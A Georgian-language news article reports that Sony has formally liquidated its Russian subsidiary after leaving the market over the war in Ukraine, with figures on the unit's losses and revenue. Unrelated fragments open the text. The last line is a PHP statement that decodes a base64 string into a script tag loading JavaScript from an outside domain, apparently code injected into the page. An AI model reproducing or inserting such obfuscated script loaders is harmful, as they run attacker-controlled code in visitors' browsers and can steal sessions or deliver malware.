global distribution
გარე ავეჯი

იაპონურმა ტრანსნაციონალურმა ტექნოლოგიურმა გიგანტმა, Sony-მ რუსეთში ადგილობრივი განყოფილების ლიკვიდაციით ბიზნესი საბოლოოდ დახურა - ამის შესახებ ინფორმაციას TASS ავრცელებს.

იურიდიული პირების ერთიანი სახელმწიფო რეესტრის მონაცემებით, კომპანია Sony Mobile Communications Rus-მა არსებობა 11 აგვისტოს შეწყვიტა. რამდენიმე დღით ადრე მას 18 წელი შეუსრულდა.

ლიკვიდაციის დოკუმენტები ფედერალურ საგადასახადო სამსახურს 2024 წლის 10 ოქტომბერს წარედგინა. Sony-მ 2023 წელსაც სცადა თავისი წარმომადგენლობის ლიკვიდაცია, თუმცა უარი მიიღო. ბოლო წლებში Sony-ს შვილობილი კომპანია დარჩენილ საქონელს ყიდდა და მოწყობილობების სერვისულ მხარდაჭერას უზრუნველყოფდა.

Sony-მ ქვეყნიდან წასვლა უკრაინაში რუსეთის სრულმასშტაბიანი შეჭრის შემდეგ გადაწყვიტა და ერთ-ერთი პირველი იყო, ვინც სანქციებს დაუჭირა მხარი. 2022 წლის მარტში რუსეთში კონსოლების მიწოდება შეწყდა და PlayStation Store-ის მომსახურება შეჩერდა. ამასთან, კომპანიამ გაეროს და Save the Children-ის მეშვეობით ომით დაზარალებული უკრაინელების მხარდასაჭერად 2 მლნ დოლარი გაიღო.

ამასთან, 2022 წლის გაზაფხულზე Sony Pictures Entertainment-მა განაცხადა, რომ რუსეთში თავისი ფილმების ჩვენებას წყვეტდა. ამის პარალელურად ფუნქციონირება Sony Music-მა შეწყვიტა და ბაზრიდან საბოლოოდ 2022 წლის 8 სექტემბერს გავიდა.

2024 წლის თებერვალში Sony-მ რუსეთში მიწოდების შეწყვეტის გამო თავისი ბრენდული მაღაზიების დახურვა დაიწყო, რაც ზაფხულისთვის დასრულდა.

უკრაინის ომამდე კორპორაციის ბიზნესი რუსეთში მომგებიანი იყო, ხოლო ქვეყნიდან გასვლის პროცედურის დაწყების შემდეგ ბიზნესი დაეცა. 2022 წელს Sony-ს რუსული განყოფილების სუფთა ზარალმა 1.43 მლრდ რუბლი (17.9 მლნ დოლარი), ხოლო 2023 წელს 530.2 მლნ რუბლი (6.7 მლნ დოლარი) შეადგინა. მართალია, გასულ წელს კომპანიამ 111.7 მლნ რუბლის (1.4 მლნ დოლარის) მოგება ისევ ნახა, მაგრამ შემოსავალი, დაახლოებით, 76%-ით შემცირდა, რადგან ის მხოლოდ საგარანტიო მომსახურებიდან და ადმინისტრაციული მხარდაჭერიდან მოდიოდა.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");